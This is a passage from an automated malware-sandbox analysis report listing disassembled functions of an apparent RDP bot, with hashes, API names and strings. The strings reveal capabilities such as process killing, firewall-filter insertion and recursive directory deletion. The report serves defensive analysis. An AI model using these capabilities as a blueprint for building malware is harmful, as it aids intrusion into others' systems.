                    • Instruction Fuzzy Hash: 16124D61A0CA4291F670AF03EC84BB9E290BF44784FC80D76D94E466D5DF7CFA659321
                    Function 00007FF704893DB3 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159filestringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                    • API String ID: 4253334766-1535167640
                    • Opcode ID: 10e833dc0d3452da4785b0ad94a31546d2ee9f8e52f6881e3946f62a432c2465
                    • Instruction ID: 780ae8c0c8c13fcd75a76be85c93bd86854157bc0e565ba7c4c1af6d1138744a
                    • Opcode Fuzzy Hash: 10e833dc0d3452da4785b0ad94a31546d2ee9f8e52f6881e3946f62a432c2465
                    • Instruction Fuzzy Hash: F2613C22E0C95395FA607E5AAC84BB8D260AF08754FD80932EC5E4B2D1DF6CFC759361
                    Function 00007FF70489FF1F Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 24libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: AddressProc$HandleLibraryLoadModule
                    • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                    • API String ID: 384173800-4041758303
                    • Opcode ID: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
                    • Instruction ID: 63029bfb364903971032cac5a4158de6949aedef55f34424b7d2d0ad07b717b9
                    • Opcode Fuzzy Hash: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
                    • Instruction Fuzzy Hash: 70F0A926E0AA1790F905EF13AC84864A7646F04740BC80932C94D563A4EFACA5798320
                    Function 00007FF70489929A Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 118COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fflushfwriteinet_addrntohl
                    • String ID: 3L$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(filt_idx=%d,res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$setup_ip4_filt
                    • API String ID: 3255839625-58178811
                    • Opcode ID: 91eab02d4129dd6947077f69cbbd103b78071940b845cf3642cb8d3f3b67fa7f
                    • Instruction ID: 3b5ca9c28135359f1f0799911a3da1abb81741972a55a7a2b350da5a29038627
                    • Opcode Fuzzy Hash: 91eab02d4129dd6947077f69cbbd103b78071940b845cf3642cb8d3f3b67fa7f
                    • Instruction Fuzzy Hash: 5B519E3260CBC589E7309F29B8807DAB7A1EB85780F844138D6CC47BA9EB7CD495CB50
                    Function 00007FF704896FD5 Relevance: 1.5, APIs: 1, Instructions: 25timeCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: Time$FileSystem
                    • String ID:
                    • API String ID: 2086374402-0
                    • Opcode ID: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
                    • Instruction ID: 3968525ee40ebe4de64c338d41631200371e0423dadede962e9a9bb2ebfc939e
                    • Opcode Fuzzy Hash: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
                    • Instruction Fuzzy Hash: CAE02BA2718C0543FF20DE1AD880BB7A751CB9C384F944430E91DC3794EB2CE9618740
                    Function 00007FF7048AB668 Relevance: .0, Instructions: 43COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 43cdbd8a1772982e1159f987e7582aee2234c2e3b90ba2fecf474b6389da8852
                    • Instruction ID: a104ba4927eb469f8d1877c40c1a88cc3de74942c05c89e30cd43e6cf209b046
                    • Opcode Fuzzy Hash: 43cdbd8a1772982e1159f987e7582aee2234c2e3b90ba2fecf474b6389da8852
                    • Instruction Fuzzy Hash: FB11C287D0DAD345F656186A0CE9BB54B805F537B8E8C0639CF3C462D29F8E78338220
                    Function 00007FF7048AB6B8 Relevance: .0, Instructions: 30COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 00f425755523f90e08f9e80f8d6c7666d97432842fe783b546abaece473fadd6
                    • Instruction ID: d5c286dae81ca9e563f7ecdbd25a993e496ecc03dde66f19e249c4f7b29517e7
                    • Opcode Fuzzy Hash: 00f425755523f90e08f9e80f8d6c7666d97432842fe783b546abaece473fadd6
                    • Instruction Fuzzy Hash: 66F0A987D0CAC341FA46186A0CAA7A14B816F537B8E8C4739CF38462D26F5F7C328224
                    Function 00007FF7048AB558 Relevance: .0, Instructions: 17COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 04e2900766d9d14cb05d71eedaab4efe8780466c1436e7a6fc7beb0f48e5108a
                    • Instruction ID: dfa884f8b79c34c823369a128e68ec0bee882247c44b9b1a67834bab0760144d
                    • Opcode Fuzzy Hash: 04e2900766d9d14cb05d71eedaab4efe8780466c1436e7a6fc7beb0f48e5108a
                    • Instruction Fuzzy Hash: E9E0E583E0DBD351F3139A394C646285E901F52764F8C42B6C7980B2D3CE8C3C21C221
                    Function 00007FF7048A05D9 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
                    • Instruction ID: 8eacfc94772ec22b91150498c3398c696784a8ebfa5c67f24c6d9c4bcea80089
                    • Opcode Fuzzy Hash: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
                    • Instruction Fuzzy Hash: 0CA00213D4DC09C8F6401F01EC41572A538EF06600FC82534C128520958B6CA020C114
                    Function 00007FF70489212F Relevance: 66.9, APIs: 13, Strings: 25, Instructions: 417processstringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: ErrorLast$Process$CloseCreateFirstHandleOpenProcess32SnapshotTerminateToolhelp32strcmp
                    • String ID: $ $ $ $(name != NULL) || (pid != 0)$C:/Projects/rdp/bot/codebase/process.c$NULL$P$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x)$[E] (%s) -> OpenProcess failed(gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> TerminateProcess failed(gle=%lu)$[I] (%s) -> Done(name=%s,pid=%lu)$process_kill$|$~$~$~$~
                    • API String ID: 3326156344-4160762685
                    • Opcode ID: 785da6137a2a4b931382c2af0aea3e34208494ad0edd5f9faf333949fd61b4c7
                    • Instruction ID: 99d6b1e90a4626231889cf16e8b65600a79c51f28a69aadf7809e434feb0d462
                    • Opcode Fuzzy Hash: 785da6137a2a4b931382c2af0aea3e34208494ad0edd5f9faf333949fd61b4c7
                    • Instruction Fuzzy Hash: C0F12D11E0CA03A2FA747E57ACC0F78D240AF15754EE80DB2CA0E466D2DF5DBDB59262
                    Function 00007FF704894D81 Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 226stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
                    • String ID: (path != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
                    • API String ID: 2460052984-4087913290
                    • Opcode ID: ab8c45f73c228b84a0d470b8f8c5b53169891f3a4891c300cb8932bb60dcd1c9
                    • Instruction ID: 98d44df7d9c9690e48f80d5f8d6f761a56e8f49afc8c949c15aac6153b6b2be8
                    • Opcode Fuzzy Hash: ab8c45f73c228b84a0d470b8f8c5b53169891f3a4891c300cb8932bb60dcd1c9
                    • Instruction Fuzzy Hash: CBA1B32290CA83A5FA20BF07ACD4BBAE351AF85745FD80831D90D466C5DF7CF8668721
                    Function 00007FF7048953BF Relevance: 42.3, APIs: 16, Strings: 12, Instructions: 270stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: strlen$strcatstrcpy$strcmp
                    • String ID: (dst != NULL)$(src != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
                    • API String ID: 2140730755-3699962909
                    • Opcode ID: 94e92f1d7dd412bbccf40c6eab8eaf92555dce9ea77cce24aaaac88b70353e06
                    • Instruction ID: b65745c7143b707e523ec53cd6062af8117d0307100562ccb4966c0e641b4586
                    • Opcode Fuzzy Hash: 94e92f1d7dd412bbccf40c6eab8eaf92555dce9ea77cce24aaaac88b70353e06
                    • Instruction Fuzzy Hash: 9DC1885290CA42A1FA21AF17ADC4BFAE351AF45784FC80832DA4D166C5DFBCF925C721
                    Function 00007FF704891D60 Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 207memoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: ErrorLastLocalToken$AllocInformation$CloseFreeHandleLengthOpenProcessfflushfwritememcpy
                    • String ID: (hnd != NULL)$(sid != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu)$[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu)$process_get_user_sid
                    • API String ID: 3826151639-1775164968
                    • Opcode ID: e108b7548233d327ae1026d39b3be0f1a9462ade1fb9710be41075d3b6f3e132
                    • Instruction ID: d542b55c859bea823734f600d7d41637897092c6c36e4ed3ae727d2cb4bec56d
                    • Opcode Fuzzy Hash: e108b7548233d327ae1026d39b3be0f1a9462ade1fb9710be41075d3b6f3e132
                    • Instruction Fuzzy Hash: 7C911722E0D90395FA60AF06ACD8B7D9252AF84795F9D0832D90E476D0DF7CBCA58361
                    Function 00007FF704898153 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 195memoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: FilterFwpmHeap$Add0DeleteFreeKey0Process$AttributesFilewcslen
                    • String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$setup_app_filt
                    • API String ID: 2990311666-1793103013
                    • Opcode ID: 3847ef115dc0734090307112082c3d7b5f69c3191055e1362a58c1a982a13ace
                    • Instruction ID: 7ad7fcc3321f5aedf9db2ce8c871b0bafc427e35a20e2e2742124e583fbfb9ca
                    • Opcode Fuzzy Hash: 3847ef115dc0734090307112082c3d7b5f69c3191055e1362a58c1a982a13ace
                    • Instruction Fuzzy Hash: 7791E52261CBC295E761AF16AC8079AA7A1EF81740F484534EACC07B99EF7DD494CB10
                    Function 00007FF70489405E Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: strlen$CreateDirectoryErrorLast$strcpy
                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                    • API String ID: 1104438493-1059260517
                    • Opcode ID: 50fc89317903a387c44a5fae6651ebdf6c4c4dd534ace68e48e9b33d03cf7596
                    • Instruction ID: d24afa80916238ee6102e0acbc9fc81772d6adb1420fceefda4f4c3e8bd13549
                    • Opcode Fuzzy Hash: 50fc89317903a387c44a5fae6651ebdf6c4c4dd534ace68e48e9b33d03cf7596
                    • Instruction Fuzzy Hash: 86719C12A1CA4381FB246F96ACC4FB99251AF59B44F9C0932C90E066D1DF6CFC669321
                    Function 00007FF70489341C Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 187synchronizationCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: ErrorLastProcess$CloseCodeExitHandle$ObjectSingleTerminateWait
                    • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(pid=%lu,err=%08x)$[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu)$[I] (%s) -> Done(pid=%lu,exit_code=%08lx)$[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$process_close
                    • API String ID: 1879646588-710610406
                    • Opcode ID: 511bfd8daa64d2c1dba60e1edc82162ff6d94539ca8573e6efb62170ceca0a00
                    • Instruction ID: 1fd4fcaa47ef22f2af6f395eb0f4f719495a7470345e71d2c1bfd0618edae1e7
                    • Opcode Fuzzy Hash: 511bfd8daa64d2c1dba60e1edc82162ff6d94539ca8573e6efb62170ceca0a00
                    • Instruction Fuzzy Hash: 0F816E62E0C91782FA61BE57ACC0E78D290AF18754F9E4872CC1E576D0DF6CBC618361
                    Function 00007FF704893909 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 123COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
